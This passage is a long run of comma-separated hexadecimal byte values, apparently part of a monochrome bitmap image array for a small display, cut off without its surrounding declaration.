0XFF,0X80,0X00,0X3F,0XFF,0XF8,0X00,0X3F,0X80,0X00,0X03,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,
0X00,0X1F,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,
0XFF,0X80,0X00,0X3F,0XFF,0XF8,0X00,0X3F,0X80,0X00,0X07,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,
0X00,0X7F,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X7F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,
0XFF,0X80,0X00,0X3F,0XFF,0XF8,0X00,0X3F,0X80,0X00,0X07,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,
0X00,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,
0XFF,0XC0,0X00,0X1F,0XFF,0XF8,0X00,0X7F,0XC0,0X00,0X07,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X01,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X7F,
0XFF,0XC0,0X00,0X1F,0XFF,0XF8,0X00,0X7F,0XC0,0X00,0X0F,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X07,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,
0XFF,0XC0,0X00,0X1F,0XFF,0XF8,0X00,0X7F,0XC0,0X00,0X0F,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X0F,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,
0XFF,0XC0,0X00,0X1F,0XFF,0XF0,0X00,0X7F,0XC0,0X00,0X0F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X3F,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,
0XFF,0XE0,0X00,0X0F,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X1F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X7F,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,
0XFF,0XE0,0X00,0X0F,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X1F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,
0XFF,0XE0,0X00,0X0F,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X1F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X03,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X3F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XF0,0X00,0X3F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XF0,0X00,0X3F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XF0,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,
0X00,0X00,0X00,0X03,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,
0X00,0X00,0X00,0X03,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,
0X00,0X00,0X00,0X03,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XF0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X7F,0XFC,0X00,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0XFF,0XFF,0XFF,0XC0,0X01,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0XFF,0XFF,0XFF,0XC0,0X01,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X07,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X7F,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X3F,0XFF,0XFF,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X1F,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X0F,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X7F,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X03,0XFF,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X7F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFC,0X00,
0X00,0X7F,0X80,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XCF,0XFF,0XFF,0XFF,0X00,0X00,0X3F,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X7F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X1F,0XFF,0XE0,0X00,0X00,0X7F,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,
0XFF,0XFF,0X00,0X00,0X3F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0X00,
0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,
0XFF,0XFF,0X80,0X00,0X3F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,
0XFF,0XFF,0X80,0X00,0X3F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XC0,
0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,
0XFF,0XFF,0X80,0X00,0X1F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XE0,
0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X7F,0XFF,
0XFF,0XFF,0X80,0X00,0X1F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X7F,0XFF,
0XFF,0XFF,0XC0,0X00,0X1F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFC,
0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X1F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X0F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XE0,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X0F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFE,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XE0,0X00,0X0F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XE0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XE0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
